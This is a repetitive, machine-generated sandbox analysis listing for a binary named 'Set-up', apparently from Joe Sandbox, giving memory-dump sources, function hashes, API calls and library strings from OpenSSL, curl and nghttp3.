                            • Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_800000_Set-up.jbxd
                            Similarity
                            • API ID: _assertmemcpy$memmove
                            • String ID: i + 1 < blk->n$lblk->n + rblk->n < NGHTTP3_KSL_MAX_NBLK$nghttp3_ksl.c
                            • API String ID: 3463011695-2629231663
                            • Opcode ID: 1f327af8a6d63d76070bd5d8ac22a656fc073e16572aa7ebfe13f44228178c6b
                            • Instruction ID: 8a52f859e7a934ca39a6e0d4ac50f57b16deb86a9896ee871210068de2f2be81
                            • Opcode Fuzzy Hash: 1f327af8a6d63d76070bd5d8ac22a656fc073e16572aa7ebfe13f44228178c6b
                            • Instruction Fuzzy Hash: 7241A0766043049FD708EF18D88196AB7E6FF99314F18C96DE8898B752E770ED01CB51
                            APIs
                            • CertGetCertificateContextProperty.CRYPT32(00000000,00000002,00000000), ref: 00A42491
                            • CertGetCertificateContextProperty.CRYPT32(00000000,00000002,00000000), ref: 00A424C6
                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00A3F5B4), ref: 00A42529
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                            • Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_800000_Set-up.jbxd
                            Similarity
                            • API ID: CertCertificateContextProperty$ErrorLast
                            • String ID: %lX$ERR_CAPI_error$Error code= 0x$engines/e_capi.c$engines/e_capi_err.c
                            • API String ID: 2217977984-837018288
                            • Opcode ID: 001a0a601ebea93f8dc14706aa8d818fe0eb94f49c8c103d306d955e6d41a0da
                            • Instruction ID: 1144e8768603eb965e2cdacd1de84d0f84c8728953d8b7577b67aa6297a6c92a
                            • Opcode Fuzzy Hash: 001a0a601ebea93f8dc14706aa8d818fe0eb94f49c8c103d306d955e6d41a0da
                            • Instruction Fuzzy Hash: DD1190A9B843047FE22037A5BC47F2B3A5CDBC5B59F404060FA08781C3E695991C8772
                            APIs
                            • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00852666
                            • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00852699
                            • _time64.API-MS-WIN-CRT-TIME-L1-1-0(00000000), ref: 008526FB
                            • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(-00000018,?,?), ref: 0085273A
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                            • Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_800000_Set-up.jbxd
                            Similarity
                            • API ID: strlen$_time64memcpy
                            • String ID: :%u$Shuffling %i addresses$hostip.c
                            • API String ID: 2198566249-1766712111
                            • Opcode ID: 0a3c208b0c389b464af9114a091224d121d4ed085d37d2fe754b11d002eead11
                            • Instruction ID: 50886217a14862055926eed015ec2a375b8ead34bf62fa9bd83a1f27b5cce86f
                            • Opcode Fuzzy Hash: 0a3c208b0c389b464af9114a091224d121d4ed085d37d2fe754b11d002eead11
                            • Instruction Fuzzy Hash: B9A1CF75A047049BD724DF18C845B6AB7E5FF99304F58442DEE8AC7382EB31E9198B82
                            APIs
                            • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000,?,00000009,?), ref: 00B869F1
                            • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000001,00000000,00000000,?,00000009,?), ref: 00B86A11
                            • memset.API-MS-WIN-CRT-STRING-L1-1-0(?,000000FF,?,?,?,?,?,00000001,00000000,00000000,?,00000009,?), ref: 00B86A53
                            • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000000,?,?,?,?,?,00000001,00000000,00000000,?,00000009,?), ref: 00B86AB6
                            • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,00000001,00000000,00000000,?,00000009,?), ref: 00B86AC7
                            • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00000001,00000000,00000000,?,00000009,?), ref: 00B86ADA
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                            • Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_800000_Set-up.jbxd
                            Similarity
                            • API ID: _errno$abortmemcpymemset
                            • String ID: UTF-8
                            • API String ID: 3754757788-243350608
                            • Opcode ID: f291c363bf0c0afe0fec9e579200669e14cf0e3f14f612d20296440be2b76d6b
                            • Instruction ID: c1fc526fa2026c4d639e629ff95d7eac70548a9bb35edc235cce5bd3f835e5c7
                            • Opcode Fuzzy Hash: f291c363bf0c0afe0fec9e579200669e14cf0e3f14f612d20296440be2b76d6b
                            • Instruction Fuzzy Hash: 3A4112B0608301AFDB15AF64DC85B2B7BE5DB89314F0889ACF885873E2EA71DC44C752
                            APIs
                            • strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00802359
                            • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00802465
                            • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 008024AB
                            • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 008023EE
                              • Part of subcall function 00801A54: abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00801A70
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                            • Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_800000_Set-up.jbxd
                            Similarity
                            • API ID: free$abortmallocstrlen
                            • String ID: $ $ $Memory allocation failed for decrypted data.
                            • API String ID: 673139954-1317699236
                            • Opcode ID: b75e4cacdc307976debd9de4c743dd94b2a199fcd2e9d3469043b26db8035c6d
                            • Instruction ID: 50be857f085a3cd530b28fea41fd1855d1a3a2728da2aae1b7b248a8cacd09ca
                            • Opcode Fuzzy Hash: b75e4cacdc307976debd9de4c743dd94b2a199fcd2e9d3469043b26db8035c6d
                            • Instruction Fuzzy Hash: 3C5192B4A047099FCB40EFA9C48599EBBF1FF88310F108959E898D7365E774D9448F92
                            APIs
                            • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00A1E16C
                            • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00A1E17B
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                            • Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_800000_Set-up.jbxd
                            Similarity
                            • API ID: strlen
                            • String ID: $ for$:$Ente$crypto/ui/ui_lib.c$er
                            • API String ID: 39653677-1187194756
                            • Opcode ID: 141d80909bbfe1c79c0a82446058137c36331749c4c32840e460ba7626984858
                            • Instruction ID: a20fcd206e7cccc2ce778c8e8d92597105b6bcfa7e247dcd2db325b0e7bf0051
                            • Opcode Fuzzy Hash: 141d80909bbfe1c79c0a82446058137c36331749c4c32840e460ba7626984858
                            • Instruction Fuzzy Hash: 7221DAF79042507BD210AB156C41EAB7BECDDA1394F098539FD0C86302F631C914C6E3
                            APIs
                              • Part of subcall function 0081D8C0: QueryPerformanceCounter.KERNEL32(?,?,?,?,?,00000000,?,0000001C,?,008101B1), ref: 0081D8E2
                            • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,0084420E,?,?), ref: 00816350
                            • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(0084420E,?,?,?,?,?,?,?,?,?,0084420E,?,?), ref: 0081635B
                            • MoveFileExA.KERNEL32(00000000,00000000,00000001(MOVEFILE_REPLACE_EXISTING)), ref: 00816369
                            • Sleep.KERNEL32(00000001), ref: 008163B2
                            • MoveFileExA.KERNEL32(00000000,00000000,00000001(MOVEFILE_REPLACE_EXISTING)), ref: 008163BC
                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,0084420E,?,?), ref: 008163C7
                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,0084420E,?,?), ref: 008163D6
                              • Part of subcall function 0081D8C0: GetTickCount.KERNEL32 ref: 0081D968
                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 008163ED
                            Memory Dump Source
                            • Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                            • Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_800000_Set-up.jbxd
                            Similarity
                            • API ID: free$FileMove_strdup$CountCounterPerformanceQuerySleepTick
                            • String ID:
                            • API String ID: 1793959362-0
                            • Opcode ID: 4047268905af96bae9fff60c2cd5e17f41b9bb61af174e7fe9176054af8f2091
                            • Instruction ID: 11f093a4477479aa1cb2056609261fb14b3c8cde92c726e87008f120f4dab443
                            • Opcode Fuzzy Hash: 4047268905af96bae9fff60c2cd5e17f41b9bb61af174e7fe9176054af8f2091
                            • Instruction Fuzzy Hash: 3711F6A6C0021457EB1176246C42BFF735CEF95724F080634FC9892342FB219AE58393
                            APIs
                            • _time64.API-MS-WIN-CRT-TIME-L1-1-0(00000000), ref: 0080623A
                            • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 0080624D
                            • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,00000000), ref: 0080627C
                            • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00806389
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                            • Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_800000_Set-up.jbxd
                            Similarity
                            • API ID: strlen$_time64memcpy
                            • String ID: .$hsts.c
                            • API String ID: 2198566249-2242870694
                            • Opcode ID: 432dd0800d7cc597532cc6f71459232ceb9b13aad6c9b1d72833a9557b89ba39
                            • Instruction ID: 4b7a9c26c0c56a99634f109f2d1e672169322715b1e3716d65790fd6f087a926
                            • Opcode Fuzzy Hash: 432dd0800d7cc597532cc6f71459232ceb9b13aad6c9b1d72833a9557b89ba39
                            • Instruction Fuzzy Hash: 0641C8B6D043546BEB607A64AC46B9B7698FF14314F090438FD4AD22C3F5B2A93886D3
                            APIs
                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,0000002E), ref: 00B8447B
                            • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,00000042), ref: 00B844C4
                            • WSAStringToAddressW.WS2_32(?,00000002,00000000,?,00000010), ref: 00B844E3
                            • strlen.API-MS-WIN-CRT-STRING-L1-1-0(0000002E), ref: 00B84500
                            • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00B8450B
                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,0000002E), ref: 00B8451F
                            • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 00B84546
                            Memory Dump Source
                            • Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                            • Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_800000_Set-up.jbxd
                            Similarity
                            • API ID: strlen$strcmp$AddressByteCharMultiStringWide
                            • String ID:
                            • API String ID: 389649969-0
                            • Opcode ID: f5536e509e10cbf0fdb81af7292167a064fc70608476d7baaebeba8a4c00d4bb
                            • Instruction ID: 2dd66659512d42fb1dc35cd23ed9b1a43e876402c6bb57d86bcae1ccec3ff8d6
                            • Opcode Fuzzy Hash: f5536e509e10cbf0fdb81af7292167a064fc70608476d7baaebeba8a4c00d4bb
                            • Instruction Fuzzy Hash: 8E3129B19043066BEB20B624DC41BFF76CCDBA1754F054268F958961A1FB75ED84C352
                            APIs
                            • wcslen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000,?,?,00A3F763,?,?,?,?,?), ref: 00A42251
                            • WideCharToMultiByte.KERNEL32 ref: 00A42284
                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000), ref: 00A422BD
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                            • Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_800000_Set-up.jbxd
                            Similarity
                            • API ID: ByteCharMultiWide$wcslen
                            • String ID: ERR_CAPI_error$engines/e_capi.c$engines/e_capi_err.c
                            • API String ID: 1062461220-336193293
                            • Opcode ID: 99a9dd8ec1e5d43ac8aa20fa498ddd6ce76c03a4567bc441b52d21d2d8a557d7
                            • Instruction ID: 81fe4f6b80356bbf57a9bdaa4467a5f7534cf78b094c66ae473bb04582d96399
                            • Opcode Fuzzy Hash: 99a9dd8ec1e5d43ac8aa20fa498ddd6ce76c03a4567bc441b52d21d2d8a557d7
                            • Instruction Fuzzy Hash: 9721FBB5F483046FF7303FA2BC4AB673A68DBC0715F158139F5086A1D1E6F868488BA1
                            APIs
                            • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,00000005,?,?,?,?,00B5DA6D,00000000,00E3E9B4,?,?,?,?,?), ref: 00B7299B
                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00B72A76
                            • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00020000), ref: 00B72A82
                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00B72AAE
                            • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00B72ABA
                            • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,?), ref: 00B72B3F
                            • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,00000000), ref: 00B72C32
                            • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000005,?,?,?,?,?,?,00B5DA6D,00000000,00E3E9B4,?,?,?,?,?), ref: 00B72CB2
                            Memory Dump Source
                            • Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                            • Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_800000_Set-up.jbxd
                            Similarity
                            • API ID: memcpy$freemalloc
                            • String ID:
                            • API String ID: 3313557100-0
                            • Opcode ID: 69232ab4a5ab3cae1741d41df010a2045a502cb55e4a66e01d3fc7ccb198a963
                            • Instruction ID: 43d5f2d030f8713af6be45b653ebe62dfa3e1c23b3a833c44226875cf3c11c93
                            • Opcode Fuzzy Hash: 69232ab4a5ab3cae1741d41df010a2045a502cb55e4a66e01d3fc7ccb198a963
                            • Instruction Fuzzy Hash: 9DD17E71A042149BCB18DF28C884AAE7BE5FF98314F1986ADFD6997391D770EC40CB91
                            APIs
                            • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,?,0095A9CE,000000D2), ref: 009B83A3
                            • strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0095A9CE), ref: 009B83C6
                              • Part of subcall function 009B60E0: GetLastError.KERNEL32(009B7CCC,?,00000000,009B7127,009B7CCC,00000000,009DCAB7,00801A70), ref: 009B60E3
                              • Part of subcall function 009B60E0: SetLastError.KERNEL32(00000000), ref: 009B61A5
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                            • Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
